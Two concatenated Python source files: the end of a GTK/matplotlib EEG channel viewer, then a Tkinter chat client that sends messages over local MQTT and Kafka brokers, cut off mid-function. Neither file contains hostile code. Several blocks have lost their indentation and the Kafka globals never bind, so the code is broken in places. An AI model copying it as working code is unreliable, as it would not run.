    self.btLeft.connect("clicked", self.cb_MvButtons)
    self.bTable.attach(self.btLeft, 2, 3, 0, 1)
    #self.btLeft.show()
    self.btRight = gtk.Button(">")
    self.btRight.connect("clicked", self.cb_MvButtons)
    self.bTable.attach(self.btRight, 3, 4, 0, 1)
    #self.btRight.show()
    self.btRright = gtk.Button(">>")
    self.btRright.connect("clicked", self.cb_MvButtons)
    self.bTable.attach(self.btRright, 4, 5, 0, 1)
    #self.btRright.show()
    self.btRrright = gtk.Button(">>>")
    self.btRrright.connect("clicked", self.cb_MvButtons)
    self.bTable.attach(self.btRrright, 5, 6, 0, 1)
    #self.btRrright.show()
    # Create "Plot" buttons
    self.btPlot = gtk.Button("Plot")
    self.btPlot.connect("clicked", self.cb_plot)
    self.bTable.attach(self.btPlot, 0, 3, 1, 2)
    #self.btPlot.show()
    self.btPlotOv = gtk.Button("Plot Overview")
    self.btPlotOv.connect("clicked", self.cb_plotOverview)
    self.bTable.attach(self.btPlotOv, 3, 6, 1, 2)
    #self.btPlotOv.show()
    # Radio-Buttons selecting the time unit of the x-axis
    self.lbTime = gtk.Label("Time:")
    self.bTable.attach(self.lbTime,0,1,2,3)
    self.rbSamples = gtk.RadioButton(None,"#")
    self.rbSamples.connect("clicked", self.cb_plot)
    self.bTable.attach(self.rbSamples,1,2,2,3)
    self.rbSecs = gtk.RadioButton(self.rbSamples,"s")
    self.rbSecs.connect("clicked", self.cb_plot)
    self.bTable.attach(self.rbSecs,2,3,2,3)
    self.rbMins = gtk.RadioButton(self.rbSamples,"m")
    self.rbMins.connect("clicked", self.cb_plot)
    self.bTable.attach(self.rbMins,3,4,2,3)
    self.rbHours = gtk.RadioButton(self.rbSamples,"h")
    self.rbHours.connect("clicked", self.cb_plot)
    self.bTable.attach(self.rbHours,4,5,2,3)
    self.rbDays = gtk.RadioButton(self.rbSamples,"d")
    self.rbDays.connect("clicked", self.cb_plot)
    self.bTable.attach(self.rbDays,5,6,2,3)
    self.hbox.pack_start(self.bTable, False, padding=50)
    # toggle for the analysis subplot
    self.bTable2 = gtk.Table(1, 1, True)
    self.btAnal = gtk.Button("Show/Hide Analysis")
    self.btAnal.connect("clicked", self.cb_showAnalysis)
    self.bTable2.attach(self.btAnal,0,1,0,1)
    self.hbox.pack_start(self.bTable2, False, padding=50)
def setup_canvas(self):
    """Create the matplotlib Figure, its GTK canvas and the navigation toolbar."""
    self.f = Figure(figsize=(5,4), dpi=100, subplotpars=SubplotParams(left=0.06, top=0.95, right=0.97, bottom=0.1,hspace=0))
    self.setup_subplots()
    self.canvas = FigureCanvas(self.f)
    #self.canvas.show()
    self.vbox.pack_start(self.canvas)
    #self.canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1)
    self.toolbar = NavigationToolbar( self.canvas, self.window )
    # forward mouse clicks on the plot to cb_canvas
    self.canvas.mpl_connect('button_press_event', self.cb_canvas)
def setup_subplots(self):
    """(Re)create the figure's axes layout.

    Always creates the main data axis (self.a) and a thin overview strip
    (self.a2); when self.showAnalysis is set, an additional analysis axis
    (self.a3) is placed above the main one.
    """
    self.f.clear()
    if self.showAnalysis:
        self.a = self.f.add_subplot(212)
        self.a2 = self.f.add_subplot(414)
        self.a3 = self.f.add_subplot(211)
        self.subplAxes = self.f.get_axes()
        # manual positions: [left, bottom, width, height]
        self.subplAxes[0].set_position([0.06,0.05,0.91,0.50])
        self.subplAxes[2].set_position([0.06,0.55,0.91,0.35])
        self.subplAxes[1].set_position([0.06,0.96,0.91,0.02])
        self.subplAxes[1].set_xticks([])
        self.subplAxes[1].set_yticks([])
    else:
        self.a = self.f.add_subplot(111)
        self.a2 = self.f.add_subplot(414)
        self.a3 = None
        self.subplAxes = self.f.get_axes()
        self.subplAxes[1].set_position([0.06,0.96,0.91,0.02])
        self.subplAxes[1].set_xticks([])
        self.subplAxes[1].set_yticks([])
    #self.a.autoscale_view(tight=True)
    #self.subplAxes[0].set_position(0,0.1,1,0.9)
    #self.subplAxes[1].set_aspect(0.01)
    #self.subplAxes[1].set_yscale('log')
def setup_TreeView(self):
    """Create the channel list: number, name, plot checkbox, highlight checkbox."""
    self.tvScrolledWin = gtk.ScrolledWindow()
    self.tvScrolledWin.set_policy(gtk.POLICY_AUTOMATIC,gtk.POLICY_AUTOMATIC)
    # columns: index (int), name (str), plot? (bool), highlight? (bool)
    self.tree = gtk.TreeStore(gobject.TYPE_INT, gobject.TYPE_STRING, gobject.TYPE_BOOLEAN, gobject.TYPE_BOOLEAN)
    self.treeV = gtk.TreeView(self.tree)
    self.treeV.get_selection().set_mode(gtk.SELECTION_MULTIPLE)
    renderer = gtk.CellRendererText()
    self.col1 = gtk.TreeViewColumn("Number", renderer,text=0)
    self.col1.set_resizable(True)
    self.col1.set_min_width(20)
    #self.col1.set_sizing(gtk.TREE_VIEW_COLUMN_AUTOSIZE)
    self.treeV.append_column(self.col1)
    self.col2 = gtk.TreeViewColumn("Channel Name", renderer, text=1)
    self.col2.set_resizable(True)
    self.col2.set_min_width(20)
    self.treeV.append_column(self.col2)
    # third column: toggle that marks a channel for highlighting/analysis
    renderer1 = gtk.CellRendererToggle()
    renderer1.set_property('activatable', True)
    renderer1.connect("toggled", self.cb_col_toggled, (self.tree, 2))
    self.col3 = gtk.TreeViewColumn("Plot?", renderer1, active=2)
    self.col3.set_resizable(True)
    self.col3.set_min_width(20)
    self.treeV.append_column(self.col3)
    renderer2 = gtk.CellRendererToggle()
    renderer2.set_property('activatable', True)
    renderer2.connect('toggled', self.cb_col_toggled, (self.tree, 3))
    self.col4 = gtk.TreeViewColumn("-", renderer2, active=3)
    self.col4.set_resizable(True)
    self.col4.set_min_width(20)
    self.treeV.append_column(self.col4)
    #self.treeV.show()
    self.tvScrolledWin.add(self.treeV)
    #self.tvScrolledWin.show_all()
    #self.hbox.pack_start(self.tvScrolledWin)
    self.hpane.add2(self.tvScrolledWin)
def plot(self):
    """Clamp the view parameters, fetch the data window and redraw everything."""
    if not self.f32Loaded:
        return False
    # first clamp start and stride so the window fits inside the file
    start=int(self.sbStartpoint.get_value())
    length=int(self.sbNDataP.get_value())
    stride=int(self.sbStride.get_value())
    if length*stride>self.reader.numDatapoints:
        stride = self.reader.numDatapoints/length
        self.sbStride.set_value(stride)
    if start+stride*length>self.reader.numDatapoints:
        start=self.reader.numDatapoints-stride*length
        self.sbStartpoint.set_value(start)
    # then fetch the data
    #tStart = time.time()
    self.get_data()
    #print "getData: Dauer: ", time.time()-tStart, "s"
    if self.chList == []:
        # nothing selected for plotting
        return False
    # then draw it
    #tStart = time.time()
    self.plot_data()
    #print "plotData. Dauer: ", time.time()-tStart, "s"
    try:
        # overview may fail before it is initialised; best effort only
        self.plot_overview_data()
        pass
    except Exception:
        pass
def plot_overview(self):
    """Zoom out to show the whole file: start at 0, maximise stride (or adapt it)."""
    if not self.f32Loaded:
        return False
    # rewind to the beginning and stretch the window across the file
    self.sbStartpoint.set_value(0)
    if (self.sbStride.get_range()[1]*self.sbNDataP.get_value())<self.reader.numDatapoints:
        # even max stride is not enough -> also raise the datapoint count
        self.sbNDataP.set_value(self.reader.numDatapoints/self.sbStride.get_range()[1])
        self.sbStride.set_value(self.sbStride.get_range()[1])
    else:
        self.sbStride.set_value(self.reader.numDatapoints/self.sbNDataP.get_value())
    self.plot()
def get_data(self):
    """Collect the channels marked for plotting and read their data window.

    Fills self.chList from the tree's "Plot?" column, then reads
    (start, length, stride) samples for those channels into self.data
    under the f32 lock, and finally rebuilds the time axis.
    """
    #tStart = time.time()
    self.chList = []
    #(model,paths) = self.treeV.get_selection().get_selected_rows()
    for item in self.tree:
        #print "---",item
        if item[2]:
            #print "   ---",item[0]
            self.chList.append(item[0])
        #print item, model[item], model[item][0], model[item][1]
    #print self.chList
    #tStart = time.time()
    if self.chList == []:
        # nothing to fetch
        return False
    start=int(self.sbStartpoint.get_value())
    length=int(self.sbNDataP.get_value())
    stride=int(self.sbStride.get_value())
    #if self.scale_strideMulti.get()>0:
    #    stride = stride*self.scale_strideMulti.get()
    tStart=time.time()
    # serialize file access with the overview thread
    self.f32Lock.acquire()
    self.data = self.reader.getData(start,length,stride,self.chList)
    self.f32Lock.release()
    #tStart = time.time()
    self.get_times()
    #self.ts = [(start+n*stride) for n in range(length)]
    pass
def plot_data(self):
    """Draw the fetched channel data (offset-stacked traces), markers and,
    if enabled, the selected analysis (specgram/xcorr/avg/wavelet).

    Uses self.data / self.ts prepared by get_data(); channels flagged in
    tree column 3 are drawn red and fed into the analysis.
    """
    #print self.data
    #print self.data.shape
    self.canvas.hide()
    if self.chList == []:
        print "Keine Kanaele"
        return False
    self.a.clear()
    self.subplAxes[0].grid(color='#AAAAAA', linestyle='--', linewidth=0.5)
    # rewrite the data with a per-channel vertical offset so traces stack
    plotdata = zeros(self.data.shape,"d")
    i=0
    #tStart = time.time()
    for d in range(self.data.shape[1]):
        #plotdata.append([(v-i*self.offset) for v in d])
        plotdata[:,d] = self.data[:,d]-i*self.offset
        i+=1
    #dataObj = []
    #print plotdata, plotdata.shape
    #tStart = time.time()
    # plot the time series; check which channels should be highlighted
    #(model,paths) = self.treeV.get_selection().get_selected_rows()
    sgData = []#None
    plotColor="k"
    self.a.plot(self.ts,plotdata,plotColor,linewidth=0.5)
    for i in range(plotdata.shape[1]):
        #print len(self.ts), len(plotdata[:,i])
        if self.tree[self.chList[i]][3]:
            # highlighted channel: red overlay + input for the analysis
            self.a.plot(self.ts,plotdata[:,i],"r",linewidth=0.5)
            #    plotColor = "r"
            #if sgData == None:
            #    sgData = plotdata[:,i]
            sgData.append(plotdata[:,i])
        #tPlotStart=time.time()
        #self.a.plot(self.ts,plotdata[:,i],plotColor,linewidth=0.5)
        #print i
    # adjust the y-ticks: one label per channel at its offset position
    if self.offset > 0:
        ytics = [-(y*self.offset) for y in range(len(self.chList))]
        yticsNames = [self.reader.channel_names[i] for i in self.chList]
        self.subplAxes[0].set_yticks(ytics)
        self.subplAxes[0].set_yticklabels(yticsNames)
    else:
        self.subplAxes[0].set_yticks([])
    #self.a.set_xlim
    #self.a.autoscale_view(tight=True, scaley=False)
    #self.a.autoscale_view(tight=False,scalex=False, scaley=True)
    # plot markers
    if(self.boolPlotMarkers):
        self.plot_markers()
    # adjust xlim/ylim
    minx = min(self.ts)
    maxx = max(self.ts)
    #print minx, maxx
    self.subplAxes[0].set_xlim((minx, maxx))
    if self.offset > 0:
        self.subplAxes[0].set_ylim(0-(len(self.chList)-1)*self.offset-self.offset,self.offset)
    else:
        self.subplAxes[0].set_ylim(-self.offset,self.offset)
    # Show some analysis?
    if self.showAnalysis:
        try:
            self.a3.clear()
        except Exception:
            print "Fehler beim Clearen von a3"
            pass
        if self.whichAnal == "Specgram":
            if len(sgData) > 0:
                # spectrogram of the first highlighted channel
                self.a3.specgram(sgData[0],Fs=self.reader.samplRate/self.sbStride.get_value())
                #Pxx = None
                #for s in sgData:
                #if Pxx == None:
                #    res = specgram(s,Fs=self.reader.samplRate/self.sbStride.get_value())
                #    Pxx=res[0]
                #    freqs = res[1]
                #else:
                #    Pxx = Pxx + specgram(s,Fs=self.reader.samplRate/self.sbStride.get_value())[0]
                #print Pxx
                #print Pxx.shape
                #im = self.a3.imshow(Pxx,extent=(0,1,freqs[0],freqs[-1]),interpolation="nearest", origin="lower",aspect="auto",cmap=cm.hot)
                #self.f.colorbar(im)
                self.a3.set_xticks([])
        elif self.whichAnal == "XCorr":
            if len(sgData) >= 2:
                # cross-correlation of the first two highlighted channels
                tmpData = correlate(sgData[0],sgData[1],mode="same")
                #print tmpData.shape, sgData[0].shape, sgData[1].shape
                self.a3.plot(tmpData)
        elif self.whichAnal == "Avg":
            if len(sgData) >= 2:
                # mean over all highlighted channels
                tmpData = sgData[0]
                for i in range(1,len(sgData)):
                    tmpData+=sgData[i]
                tmpData /= len(sgData)
                self.a3.plot(tmpData)
        elif self.whichAnal == "Wavelet":
            if len(sgData) >= 1:
                tmpData = sgData[0]
                #wts = wavedec_lin(tmpData,"db4")
                #self.a3.plot(wts)
                # multilevel wavelet decomposition, finest level first
                mld = pywt.wavedec(tmpData, "db4")
                #print mld
                level=0
                self.a3.plot(linspace(0,len(tmpData),mld[-1].shape[0]),mld[-1],label=str(level))
                self.a3.twinx()
                for sc in mld[:-1]:
                    self.a3.plot(linspace(0,len(tmpData),sc.shape[0]),sc,label=str(level))
                    level+=1
                self.a3.legend()
    sys.stdout.flush()
    #self.hpane.set_position(self.hpane.get_position()-1
    self.canvas.show()
def get_overview_data(self):
    """Read a 1000-point decimated whole-file average (every 2nd channel)
    for the overview strip, then redraw it."""
    #self.ovData = self.reader.get
    #self.f32Lock.acquire()
    #tmpData = self.reader.getOverviewData(100)
    #self.f32Lock.release()
    #self.ovData = tmpData.mean(1)
    #self.ovTs = range(0,self.reader.numDatapoints,self.reader.numDatapoints/tmpData.shape[0])[:100]
    #self.plotOvData()
    self.f32Lock.acquire()
    tmpData = self.reader.getOverviewData(1000,range(0,len(self.reader.channel_names),2))
    self.f32Lock.release()
    # mean across channels -> single overview trace
    self.ovData = tmpData.mean(1)
    self.ovTs = range(0,self.reader.numDatapoints,self.reader.numDatapoints/tmpData.shape[0])[:1000]
    self.setup_subplots()
    self.plot_overview_data()
def plot_overview_data(self):
    """Redraw the small overview axis and shade the currently visible window."""
    overview = self.a2
    overview.clear()
    overview.plot(self.ovTs, self.ovData)
    # the overview strip carries no tick labels
    ov_axis = self.subplAxes[1]
    ov_axis.set_xticks([])
    ov_axis.set_yticks([])
    overview.autoscale_view(tight=True)
    # read the current view parameters
    first_sample = int(self.sbStartpoint.get_value())
    n_points = int(self.sbNDataP.get_value())
    step = int(self.sbStride.get_value())
    # green rectangle spanning the samples shown in the main plot
    last_sample = first_sample + step * n_points
    overview.axvspan(first_sample, last_sample, fc="g", alpha=0.4)
    self.canvas.show()
def plot_markers(self):
    """Plot all markers within the currently visible x-range.

    Trigger lines are colored per trigger name; user-made marks (from the
    marker window) are drawn in teal. Both lookups are best-effort: if no
    marker source is loaded, the corresponding try-block simply passes.
    """
    # fixed palette, indexed by the last digits of the trigger name
    markersColors = [ '#9E7448' , '#658049' , '#C03DC6' , '#945563' , '#194EB3' , '#718EB6' , '#B03C42' , '#C38591' , '#A2357B' , '#7569A2' , '#7E8DA2' , '#282760' , '#92C08A' , '#372F88' , '#7E3789' , '#768966' , '#A97C21' , '#ACB3C2' , '#1B7266' , '#40569E' , '#BCA4C4' , '#A8996A' , '#584539' , '#9B3F4B' , '#595F58' , '#53798E' , '#6C7183' , '#72AD71' , '#1EA041' , '#7DABBA' , '#24371B' , '#6F7122' , '#9D20B5' , '#593851' , '#9C1A2D' , '#AC57C5' , '#378B48' , '#4223B2' , '#75B32F' , '#B4664E' , '#2E6C85' , '#903EA9' , '#3ABD19' , '#9F6CC5' , '#C01619' , '#6FAD8D' , '#40C753' , '#7F6199' , '#23853D' , '#258816' , '#34518F' , '#4B168D' , '#8CBB95' , '#1B8036' , '#76959F' , '#A6759E' , '#A4C059' , '#498283' , '#A26F5C' , '#50BB35' , '#228796' , '#905A45' , '#AB3694' , '#1B8EBF' , '#92B96F' , '#4D6E4E' , '#701431' , '#5BC547' , '#37495C' , '#486E1B' , '#86449B' , '#B4B68E' , '#958115' , '#20415F' , '#214D4F' , '#2AA42C' , '#5E52B9' , '#178E39' , '#A5166D' , '#A49F79' , '#49C06A' , '#6D881B' , '#701A67' , '#9090AC' , '#377832' , '#51C53B' , '#B53936' , '#334C1D' , '#A147C5' , '#C2C628' , '#363265' , '#633AC5' , '#75AB9C' , '#333079' , '#4B2945' , '#773A57' , '#51B3B2' , '#84A598' , '#274B15' , '#BD4268']
    # NOTE: `xrange` shadows the Python 2 builtin here
    xrange = self.a.get_xlim()
    #print xrange
    if self.markMaker != None:
        #print "rangeToTake:", [float(x)*self.tsFactor for x in xrange]
        gtkMarkerMarks = self.markMaker.getMarks(rangeToTake=[float(x)*self.tsFactor for x in xrange])
    if self.trigManager != None:
        #print "rangeToTake:", [float(x)*self.tsFactor for x in xrange]
        trigs = self.trigManager.getMarks(rangeToTake=[float(x)*self.tsFactor for x in xrange])
    try:
        # alternate the label y-position so adjacent labels don't overlap
        textSwitch=0
        for i in trigs.keys():
            for j in trigs[i]:
                #print (j-self.timesOffset)/self.tsFactor
                #if (j-self.timesOffset)/self.tsFactor>xrange[0] and (j-self.timesOffset)/self.tsFactor<xrange[1]:
                #print (j-self.timesOffset)/self.tsFactor
                try:
                    colorIdx=int(i[-3:])%97
                except Exception,e:
                    colorIdx=0
                self.a.axvline((j-self.timesOffset)/self.tsFactor, lw=2, alpha=0.5, color=markersColors[colorIdx])
                self.a.text((j-self.timesOffset)/self.tsFactor,0+textSwitch*self.offset/2,i,fontsize=6)
                textSwitch=textSwitch-1
    except Exception, e:
        # no triggers loaded -- nothing to draw
        pass
    try:
        for tp in gtkMarkerMarks:
            self.a.axvline((tp-self.timesOffset)/self.tsFactor, lw=2, alpha=0.5, color="#00937B")
    except Exception, e:
        # no user marks loaded -- nothing to draw
        pass
    # try:
    #     for tp in trigs:
    #         self.a.axvline((tp-self.timesOffset)/self.tsFactor, lw=1.5, alpha=0.5, color="#000000")
    # except Exception, e:
    #     #print "Keine Markers geladen..."
    #     pass
def get_times(self):
    """Build self.ts (x-axis values) and self.tsFactor for the chosen unit.

    self.ts holds one value per displayed sample; self.tsFactor converts a
    plotted x value back into raw sample numbers (1 when plotting samples).
    """
    first = int(self.sbStartpoint.get_value())
    n_points = int(self.sbNDataP.get_value())
    step = int(self.sbStride.get_value())
    # raw sample indices, shifted by the global time offset
    self.ts = [(first - self.timesOffset + k * step) for k in range(n_points)]
    samplR = self.reader.samplRate
    self.tsFactor = 1
    # pick the divisor for the selected time-unit radio button
    if self.rbSecs.get_active():       # seconds
        divisor, factor = samplR, samplR
    elif self.rbMins.get_active():     # minutes
        divisor, factor = samplR*60., samplR*60
    elif self.rbHours.get_active():    # hours
        divisor, factor = samplR*3600., samplR*3600
    elif self.rbDays.get_active():     # days
        divisor, factor = samplR*86400., samplR*86400
    else:                              # raw sample numbers
        divisor, factor = None, None
    if divisor is not None:
        self.ts = [float(t)/divisor for t in self.ts]
        self.tsFactor *= factor
def main():
    """Run the GTK main loop; returns 0 after the loop exits."""
    gtk.main()
    return 0
if __name__ == "__main__":
if len(sys.argv)>1:
#print sys.argv[1], "wurde als Argument übergeben."
if os.path.exists(sys.argv[1]):
p = EEGPlot(sys.argv[1])
else:
p = EEGPlot()
else:
p = EEGPlot()
main() |
KafkaCli.py | import time
from tkinter import Tk, Toplevel, Label, CENTER, Entry, Button, Text, Scrollbar, \
DISABLED, END, NORMAL, LEFT, RIGHT, StringVar, BOTTOM, IntVar
import paho.mqtt.client as paho
from pykafka import KafkaClient
import threading
# MQTT-related variables
client = ''
username = ''
topic = "geral" # topic all clients subscribe to
broker = "localhost"
port = 1883
# Kafka-related variables (set up in interface.goAhead)
kafka_client = ''
kafka_topic = ''
kafka_producer = ''
# Shared application state
flag = 0 # used only for a few checks
msg = [] # [destination, source, message, isGroup]
message = "" # message to be sent
block = [] # list of blocked contacts
grpName = "" # group name
groups = [] # groups this user has been added to
etry = ""
msgToSend = 0
newMessages = [] # queued [sender, text, count] entries not yet displayed
# window geometry constants
LOGIN_WIDTH = 400
LOGIN_HEIGHT = 300
CHAT_WIDTH = 800
CHAT_HEIGHT = 500
class interface:
    """Tkinter chat client GUI (login window + main chat window)."""
    # class-level defaults, rebound per selection in getContact()
    dst = []      # destination of the current message
    msgToSend = 0 # 1 when the selected destination is a group, else 0
    def __init__(self):
        """Build the (hidden) chat window and the login dialog, then block in mainloop."""
        # chat window which is currently hidden
        self.Window = Tk()
        self.Window.withdraw()
        # login window
        self.login = Toplevel()
        # set the title
        self.login.title("Login")
        self.login.resizable(width=False,
                             height=False)
        self.login.configure(width=LOGIN_WIDTH,
                             height=LOGIN_HEIGHT)
        # create a Label
        self.pls = Label(self.login,
                         text="Por Favor Digite seu Nome",
                         justify=CENTER,
                         font="Helvetica 14 bold")
        self.pls.place(relheight=0.15,
                       relx=0.2,
                       rely=0.07)
        # create a Label
        self.labelName = Label(self.login,
                               text="Username: ",
                               font="Helvetica 12")
        self.labelName.place(relheight=0.2,
                             relx=0.1,
                             rely=0.2)
        # create a entry box for
        # typing the username
        self.entryName = Entry(self.login,
                               font="Helvetica 14")
        self.entryName.place(relwidth=0.4,
                             relheight=0.12,
                             relx=0.35,
                             rely=0.2)
        # set the focus of the cursor
        self.entryName.focus()
        # create a Continue Button
        # along with action
        self.go = Button(self.login,
                         text="Login",
                         font="Helvetica 14",
                         command=lambda: self.goAhead(self.entryName.get()))
        self.go.place(relx=0.4,
                      rely=0.55)
        self.buttonPos = 0       # vertical position of the next contact/group button
        self.listContacts = []   # used to add people to groups
        # NOTE: construction blocks here until the GUI is closed
        self.Window.mainloop()
def goAhead(self, name):
self.login.destroy()
global username
global client
username = name
client = paho.Client(username)
client.on_subscribe = on_subscribe
client.on_unsubscribe = on_unsubscribe
client.on_connect = on_connect
client.on_message = self.on_message
client.connect(broker, port)
client.loop_start()
client.subscribe(topic)
kafka_client = KafkaClient(hosts="localhost:9092")
kafka_topic = kafka_client.topics[topic]
kafka_producer = kafka_topic.get_sync_producer()
self.layout(name)
    def layout(self, name):
        """Build the main chat window: header, contact buttons, chat pane, input row."""
        self.name = name
        # to show chat window
        self.Window.deiconify()
        self.Window.title("XasUP APP")
        self.Window.resizable(width=False,
                              height=False)
        self.Window.configure(width=CHAT_WIDTH,
                              height=CHAT_HEIGHT,
                              bg="#17202A")
        # header with the logged-in username
        self.labelHead = Label(self.Window,
                               bg="#17202A",
                               fg="#EAECEE",
                               text=self.name,
                               font="Helvetica 13 bold",
                               pady=5)
        self.labelHead.place(relwidth=0.7)
        self.buttonMsgAddGroup = Button(self.Window,
                                        text="Add Group",
                                        font="Helvetica 8 bold",
                                        width=20,
                                        bg="#ABB2B9",
                                        command=lambda: self.creategroup())
        self.buttonMsgAddGroup.place(relx=0.7,
                                     # rely=0.05,
                                     relheight=0.1,
                                     relwidth=0.1)
        self.buttonMsgAddContact = Button(self.Window,
                                          text="Add Contato",
                                          font="Helvetica 8 bold",
                                          width=20,
                                          bg="#ABB2B9",
                                          command=lambda: self.personContact())
        self.buttonMsgAddContact.place(relx=0.8,
                                       # rely=0.05,
                                       relheight=0.1,
                                       relwidth=0.1)
        # toggles block status of the currently selected contact
        self.buttonMsgBlockContat = Button(self.Window,
                                           text="Bloquear",
                                           font="Helvetica 8 bold",
                                           width=20,
                                           bg="#ABB2B9",
                                           command=lambda: self.getContact(self.dst, 2))
        self.buttonMsgBlockContat.place(relx=0.9,
                                        # rely=0.05,
                                        relheight=0.1,
                                        relwidth=0.1)
        self.line = Label(self.Window,
                          width=450,
                          bg="#ABB2B9")
        self.line.place(relwidth=0.7,
                        rely=0.07,
                        relheight=0.012)
        # NOTE(review): `global textCons` is declared but only self.textCons
        # is ever assigned -- the global appears unused; confirm before removal.
        global textCons
        self.textCons = Text(self.Window,
                             width=10,
                             height=2,
                             bg="#17202A",
                             fg="#EAECEE",
                             font="Helvetica 10",
                             padx=5,
                             pady=5)
        self.textCons.place(relheight=0.745,
                            relwidth=0.7,
                            rely=0.08)
        self.labelBottom = Label(self.Window,
                                 bg="#ABB2B9",
                                 height=80)
        self.labelBottom.place(relwidth=0.7,
                               rely=0.825)
        self.entryMsg = Entry(self.labelBottom,
                              bg="#2C3E50",
                              fg="#EAECEE",
                              font="Helvetica 13")
        # place the given widget
        # into the gui window
        self.entryMsg.place(relwidth=0.74,
                            relheight=0.06,
                            rely=0.008,
                            relx=0.011)
        self.entryMsg.focus()
        # create a Send Button
        self.buttonMsg = Button(self.labelBottom,
                                text="Send",
                                font="Helvetica 10 bold",
                                width=20,
                                bg="#ABB2B9",
                                command=lambda: self.sendButton(self.entryMsg.get()))
        self.buttonMsg.place(relx=0.77,
                             rely=0.008,
                             relheight=0.06,
                             relwidth=0.22)
        self.textCons.config(cursor="arrow")
        # create a scroll bar
        scrollbar = Scrollbar(self.textCons)
        # place the scroll bar
        # into the gui window
        scrollbar.place(relheight=1,
                        relx=0.974)
        scrollbar.config(command=self.textCons.yview)
        # chat pane is read-only until printMsg temporarily unlocks it
        self.textCons.config(state=DISABLED)
    def creategroup(self):
        """Modal dialog asking for a group name; then add members and create its button."""
        groupname = StringVar()
        top = Toplevel(self.Window)
        label1 = Label(top, text="Insira nome do grupo")
        label1.pack(side=LEFT)
        entry = Entry(top, bd=5)
        entry.pack(side=LEFT)
        button = Button(top, text="Confirmar",
                        command=lambda: groupname.set(entry.get()))
        button.pack(side=LEFT)
        # blocks until the confirm button sets the StringVar
        button.wait_variable(groupname)
        print(groupname.get())
        top.destroy()
        self.addContactGroup()
        self.createButtonGroup(groupname.get())
def addContactGroup(self):
exit = IntVar()
top = Toplevel(self.Window)
label1 = Label(top, text="Digite um contato para inserir no grupo")
label1.pack(side=LEFT)
entry = Entry(top, bd=5)
entry.pack(side=LEFT)
button1 = Button(top, text="Adicionar",
command=lambda: self.checkContact(entry.get()))
button1.pack(side=LEFT)
button2 = Button(top, text="Sair",
command=lambda: exit.set(1))
button2.pack(side=LEFT)
button2.wait_variable(exit)
top.destroy()
def checkContact(self, contact):
print(self.listContacts)
if not self.listContacts:
print("Criação de um grupo invalido! Crie um contato.")
else:
for i in self.listContacts:
if contact == i:
print("Nome cadastrado")
else:
print("Contato não existente")
    def personContact(self):
        """Modal dialog asking for a contact name; registers it and creates its button."""
        personname = StringVar()
        top = Toplevel(self.Window)
        label1 = Label(top, text="Insira nome do contato")
        label1.pack(side=LEFT)
        entry = Entry(top, bd=5)
        entry.pack(side=LEFT)
        button = Button(top, text="Confirmar",
                        command=lambda: personname.set(entry.get()))
        button.pack(side=LEFT)
        # blocks until the confirm button sets the StringVar
        button.wait_variable(personname)
        self.listContacts.append(personname.get())
        top.destroy()
        self.createPersonContact(personname.get())
    def createButtonGroup(self, groupname):
        """Add a sidebar button that selects the group `groupname` as destination.

        NOTE(review): every contact/group button is stored in the same
        attribute `buttonMsg12347`, so only the most recent button can be
        re-labelled later -- confirm this is intended.
        """
        # stack buttons downwards, one slot (10% height) per entry
        self.buttonPos += 0.1
        self.buttonMsg12347 = Button(self.Window,
                                     text="Grupo " + groupname,
                                     font="Helvetica 8 bold",
                                     width=20,
                                     bg="#ABB2B9",
                                     command=lambda: self.getContact(groupname, 1))
        self.buttonMsg12347.place(relx=0.7,
                                  rely=self.buttonPos,
                                  relheight=0.1,
                                  relwidth=0.3)
    def createPersonContact(self, nameperson):
        """Add a sidebar button that selects the contact `nameperson` as destination.

        NOTE(review): shares the single `buttonMsg12347` attribute with
        createButtonGroup -- only the latest button stays addressable.
        """
        # stack buttons downwards, one slot (10% height) per entry
        self.buttonPos += 0.1
        self.buttonMsg12347 = Button(self.Window,
                                     text=nameperson,
                                     font="Helvetica 8 bold",
                                     width=20,
                                     bg="#ABB2B9",
                                     command=lambda: self.getContact(nameperson, 0))
        self.buttonMsg12347.place(relx=0.7,
                                  rely=self.buttonPos,
                                  relheight=0.1,
                                  relwidth=0.3)
    def getContact(self, nameperson, isGrp):
        """Select `nameperson` as the active chat destination.

        isGrp: 0 = person, 1 = group, 2 = toggle block status of the
        currently selected contact. Clears the chat pane and flushes any
        queued messages from that sender.
        """
        flag = 0
        # wipe the chat pane before showing the new conversation
        self.textCons.config(state=NORMAL)
        self.textCons.delete(1.0, END)
        self.textCons.config(state=DISABLED)
        self.textCons.see(END)
        if newMessages:
            x = 0
            # display queued messages from this sender
            for i in range(len(newMessages)):
                if nameperson == newMessages[i][0]:
                    auxMsg = "{}: {}\n".format(newMessages[i][0], newMessages[i][1])
                    self.printMsg(auxMsg)
                    x += 1
            # reset the unread-count label on the (latest) contact button
            self.buttonMsg12347.configure(text=f'{nameperson}')
            # NOTE(review): pop(0) removes the x oldest queued entries
            # regardless of sender -- confirm this matches the intent.
            for i in range(x):
                newMessages.pop(0)
        if isGrp == 0:
            self.dst = nameperson
            self.msgToSend = 0
            print("is person")
        elif isGrp == 1:
            self.dst = nameperson
            self.msgToSend = 1
            print("is group")
        elif isGrp == 2:
            # toggle block: unblock if already blocked, otherwise block
            for i in range(len(block)):
                if self.dst == block[i]:
                    block.remove(self.dst)
                    flag = 1
            if flag == 0:
                block.append(nameperson)
def sendButton(self, msg):
self.textCons.config(state=DISABLED)
self.msg = msg
self.entryMsg.delete(0, END)
snd = threading.Thread(target=self.on_publish())
snd.start()
def printMsg(self, msg):
self.textCons.config(state=NORMAL)
self.textCons.insert(END, msg)
self.textCons.config(state=DISABLED)
self.textCons.see(END)
def on_message(self, client, userdata, message):
    """MQTT message callback: route an incoming chat payload to the GUI.

    Payload layout (dot separated): destination.sender.text.group_flag,
    where group_flag '0' means a direct message; anything else is group
    traffic (a group broadcast, or a membership list for a new group).
    """
    flag = 0
    aux = 0
    # Payload arrives as raw bytes; decode to utf-8 and split into fields.
    msg = message.payload.decode("utf-8").split(".")
    # BUG FIX: `msg` is a list after split(); a list has no .encode(), so
    # the original raised AttributeError on every message. Re-join the
    # fields before forwarding the payload to Kafka.
    kafka_producer.produce(".".join(msg).encode('ascii'))
    if str(msg[1]) != username:  # ignore messages this user sent
        if str(msg[3]) == '0':   # direct (person-to-person) message
            # Is the message addressed to this username?
            if str(msg[0]) == username:
                # Drop the message if the sender is on the block list.
                for i in range(len(block)):
                    if block[i] == str(msg[1]):
                        print("Quem enviou esta na lista de bloqueados")
                        flag = 1
                        break
                if flag == 0:
                    if self.dst != str(msg[1]):
                        # Chat not currently open: queue the message and show
                        # an unread counter on the contact button.
                        for i in range(len(newMessages)):
                            if str(msg[1]) == newMessages[i][0]:
